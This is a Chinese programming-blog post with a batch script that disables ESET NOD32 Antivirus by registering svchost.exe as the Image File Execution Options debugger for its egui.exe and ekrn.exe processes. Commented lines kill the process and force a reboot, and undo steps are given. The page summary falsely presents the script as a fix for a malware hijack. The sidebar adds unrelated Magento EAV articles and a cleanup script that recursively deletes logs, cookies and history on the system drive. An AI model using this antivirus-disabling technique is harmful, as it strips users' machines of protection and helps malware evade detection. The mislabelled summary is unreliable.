[编程实例]批处理干掉EAV

最新推荐文章于 2024-11-08 12:18:48 发布
原创 最新推荐文章于 2024-11-08 12:18:48 发布 · 604 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#编程

本文提供了一个批处理脚本,用于解决ESET NOD32 Antivirus被恶意软件劫持的问题。通过修改注册表设置来禁用受影响的进程,并提供了解除劫持的方法及服务重启步骤。
 
  1. @echo off
  2. reg  add "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  4. Execution Options/egui.exe" /v debugger /t reg_sz /d svchost.exe /f >nul 
  6. 2>nul
  7. reg  add "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  9. Execution Options/ekrn.exe" /v debugger /t reg_sz /d svchost.exe /f >nul 
  11. 2>nul
  12. ::reg delete HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run  /v egui  /f 
  14. >nul 2>nul  
  15. ::taskkill /f /im egui.exe >nul
  16. ::重启计算机,eav宣布投降
  17. ::shutdown -r -t 0
  18. pause
  20. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  22. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  24. :::::::::::::::::
  25. ::下面是恢复EAV的注册表文件内容(!安装路径可能不一样):
  26. ::Windows Registry Editor Version 5.00
  28. ::[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
  29. ::"egui"="/"E://Program Files//ESET//ESET NOD32 Antivirus//egui.exe/" /hide 
  31. /waitservice"
  33. ::解除对EAV的劫持
  34. ::reg  delete "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  36. Execution Options/egui.exe"  /f  >nul 2>nul
  37. ::reg  delete "HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File 
  39. Execution Options/ekrn.exe"  /f  >nul 2>nul
  41. ::重新启动eset服务
  42. ::net start ekrn
mysql eav_Magento的EAV模型窥探
weixin_36260335的博客
01-27 266
1. 问题提出:假设需要定义一个实体Customer的信息,通常我们只要定义一个表为customer,并定义相应的属性即可。倘若某天需要为customer增加一个新的属性如“毕业学校”,那么就需要更改表的结构。如果使用EAV模型则不必改变表结构。2. Magento的EAV模型定义:在Magento中,EAV模型相关的表定义有:eav_attributeeav_attribute_groupeav...
mysql eav设计模型_Magento 2数据库EAV模型结构
weixin_35076634的博客
02-17 670
EAV模型是一种数据模型,用于描述实体的数量预计会很大,但事实上,实体中要使用的属性数量并不多。 Magento 2这么设计是为了灵活性,在不影响主干的基础上,任意新增删除属性。 EAV模型(E ->实体,A -> 属性,V -> 值)简单理解就是分表,不需要把所有字段都放在主表里,而是按类型存放在不同的副表上。 对于字段少的项目来说 EAV其实没啥用 效率不高。按照常规做法,比...
批处理文件
BoArmy的专栏
03-09 5933
基础部分: ====================================================================== 一、基础语法: 1.批处理文件是一个“.bat”结尾的文本文件,这个文件的每一行都是一条DOS命令。可以使用任何文本文件编辑工具创建和修改。 2.批处理是一种简单的程序,可以用 if 和 goto 来控制流程,也可以使用 for 循环
很强悍的删除系统垃圾批处理工具
09-28
自己编写的很强悍的删除系统垃圾批处理工具: @echo off color 02 echo ::清理局域网共享痕迹--注册表:: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares" /f >nul 2>nul echo ::用户运行或操作历史记录--注册表:: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.rar" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.mp3" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.jpg" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.ini" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.eip" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.htm" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.ico" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.inf" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.gif" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.wav" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.xls" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.rm" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\mp3" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\rm" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\wav" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bat" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\exe" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\eip" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\ico" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\htm" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\jpg" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count" /va /f >nul 2>nul reg delete "HKCU\Software\WinRAR\ArcHistory" /va /f >nul 2>nul reg delete "HKCU\Software\WinRAR\DialogEditHistory\ArcName" /va /f >nul 2>nul reg delete "HKCU\Software\WinRAR\DialogEditHistory\ExtrPath" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\MediaPlayer\Player\RecentFileList" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Microsoft Management Console\Recent File List" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Recent File List" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Office\11.0\Excel\Recent File" /va /f >nul 2>nul reg delete "HKCU\Software\Microsoft\Office\11.0\Word\Data" /v "Settings" /f >nul 2>nul reg delete "HKCU\Software\VMware, Inc." /va /f >nul 2>nul echo ::清理IE浏览历史的下拉列表--注册表:: reg delete "HKCU\Software\Microsoft\Internet Explorer\TypedUrls" /va /f >nul 2>nul echo ::清理系统垃圾文件:: del /f /q "%ALLUSERSPROFILE%\Documents\DrWatson\*.*">nul 2>nul del /f /q "%USERPROFILE%\Application Data\Microsoft\Office\Recent\*.lnk">nul 2>nul del /f /s /q %systemdrive%\*.tmp del /f /s /q %systemdrive%\*._mp del /f /s /q %systemdrive%\*.log del /f /s /q %systemdrive%\*.gid del /f /s /q %systemdrive%\*.chk del /f /s /q %systemdrive%\*.old del /f /s /q %USERPROFILE%\Local Settings\Temp\*.* del /f /s /q %systemdrive%\recycled\*.* del /f /s /q %windir%\*.bak del /f /q %userprofile%\cookies\*.* del /f /q %userprofile%\recent\*.* del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" del /f /s /q "%userprofile%\Local Settings\Temp\*.*" del /f /s /q "%userprofile%\recent\*.*" del /f /s /q %windir%\system32\dllcache\*.* DEL /F /s /q %windir%\temp\*.* del /f /s /q %windir%\prefetch\*.* del /f /s /q %windir%\*.log echo sfc /purgecache '清理系统盘无用文件 echo defrag %systemdrive% -b '优化预读信息 exit 将以上代码存为.bat文件即可。 建议大家手动删一下这些目录下的垃圾文件: C:\WINDOWS\system32\dllcache C:\WINDOWS\Prefetch C:\WINDOWS\Temp C:\Documents and Settings\%userfile%\Cookies C:\Documents and Settings\Administrator\Local Settings\Temp C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files C:\Documents and Settings\Administrator\Recent 还有windows目录下所有蓝色的以$符号开头结尾的系统更新垃圾! 当然,你要开启查看隐藏文件才行,
手把手带你卸载ESET Endpoint Security
最新发布
xy779323365的博客
11-08 9310
大厂实习,发现自己电脑被监控了?在自己电脑上登大厂通讯软件,自己电脑也被监控了......
java eav模式_Magento 2中EAV模型的理解
weixin_42299032的博客
03-06 1044
今天我将要讲述Magento 2中的EAV模型,Magento 2的数据库使用的技术是一个以实体-属性-值得模型的一种数据模型简称:EAV模型实体-属性-值(Entity-Attribute-Value)模型是一种数据模型,用于描述期望属性数量非常多的实体,但实际上,实体中使用的属性数量很少。实体=Entity:存储有关所存储数据类型的信息。在Magento的例子中customer produ...
java eav,实体属性值(EAV)框架?
weixin_32968105的博客
02-27 308
I'd seen Entity Attribute Value in lots of contexts before I actually learnt what its name was. Its that technique that often crops up when instead of storing data in database columns you 'flip it' an...
java eav模式_实体属性值模式(EAV 模式)
weixin_39821189的博客
03-06 1138
实体属性值(Entity--attribute--value EAV)模式,可以方便 PHP 实现 EAV 模型。4.4.1. 目的实体属性值模型(Entity-attribute-value EAV)是一种用数据模型描述实体的属性(属性,参数),可以用来形容他们潜在巨大,但实际上将适用于给定的实体的数量是相对较少。 在数学中,这种模式被称为一个稀疏矩阵 。 EAV也被称为对象的属性值的模式,垂直...
java eav_动态自定义字段属性–Magento的EAV模型 | 学步园
weixin_32489501的博客
02-27 723
EAV : Entity - Attribute - Value 的缩写,是数据库模型的一种,使用eav建模的好处是可以动态为数据模型增加或移除属性。1. 问题提出:假设需要定义一个实体Customer的信息,通常我们只要定义一个表为customer,并定义相应的属性即可。倘若某天需要为customer增加一个新的属性如“毕业学校”,那么就需要更改表的结构。如果使用EAV模型则不必改变表结构。2....
mysql eav,MySQL:如何转换为EAV
weixin_32340083的博客
01-19 124
Say I have the following table:TABLE: one===============================| id | first_name | last_name |===============================| 1 | John | Doe || 2 | Jane | Smith |----...
eav中控编程手册
01-02
EAV中控编程手册》提供了详尽的指导,帮助用户高效地利用EAV编程中央控制系统进行在线编程EAV系统采用先进的在线(WEB)编程技术,无需额外安装编程软件,用户只需通过常见的Web浏览器如Windows Internet ...
EAV编程中央控制系统 额
01-02
在这一背景下,EAV编程中央控制系统作为一款先进的控制解决方案,为各类机构带来了前所未有的便捷和高效。在司法领域,尤其是法院的日常运作中,这种系统的技术集成和应用便显得尤为重要。 法院作为法律的执行和...
eav:Laravel Artisan的实体-属性-价值模型(EAV
05-09
实体-属性-价值模型(EAV)是一种数据模型,以节省空间的方式对实体进行编码,其中可用于描述实体的属性(属性,参数)的数量可能很大,但是实际适用于给定的实体是相对适度的。 文献资料 何时使用 让我们考虑一种...
eav:提供EAV(实体-属性-值)设计模式
05-11
EAV插件 实体属性值模型(EAV)是用于描述实体的数据模型,其中可用于描述实体的属性(属性,参数)的数量可能很大,但是实际应用于给定实体的数量相对来说谦虚。 在数学中,此模型称为稀疏矩阵。 EAV也称为对象-...
simple-java-eav:使用 Java 编写的实体属性值 (EAV) 模式的简单实现
05-30
Java作为一种广泛使用的编程语言,可以用来实现EAV模式,以满足业务需求。 在"simple-java-eav"项目中,我们可以预期它提供了一个简单的Java实现,帮助开发者处理EAV模式下的数据操作。该项目可能包括以下关键组件...
C#等待5秒源代码
shile的专栏
12-20 6429
using System;using System.Threading;namespace cs_basic { class program { static void Main() { Thread.Sleep(5000); } }}
[编程实例]使用vbs脚本添加程序到自启动项
shile的专栏
12-13 3435
提示:写文章后发现,优快云的编辑器过滤了一些字符,比如&,所以下面的脚本可能会运行错误。。看官添加&&这个字符就可以了。 vbs脚本的功能呢是很多的,不过有时候我们只需要其中的某些功能,今天我突然想研究下怎么用vbs脚本实现添加程序到自启动项......  首先来一段吧... =====================================
[编程实例]win32汇编语言调用dll结束进程[使用masmplus1.2]
shile的专栏
09-24 2247
;MASMPlus 代码模板 - 普通的 Windows 程序代码.386.Model Flat, StdCallOption Casemap :NoneInclude windows.incInclude user32.incInclude kernel32.incInclude gdi32.incincludelib gdi32.libI
[编程实例]linux 设置网卡为混杂模式
shile的专栏
12-10 2086
 #include #include #include #include #include #include  #include #include #include #include #include int main(int argc, char **argv) {  int sock, n;  struct ifreq ethreq;  if ( (sock=socket(PF_PACKET,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值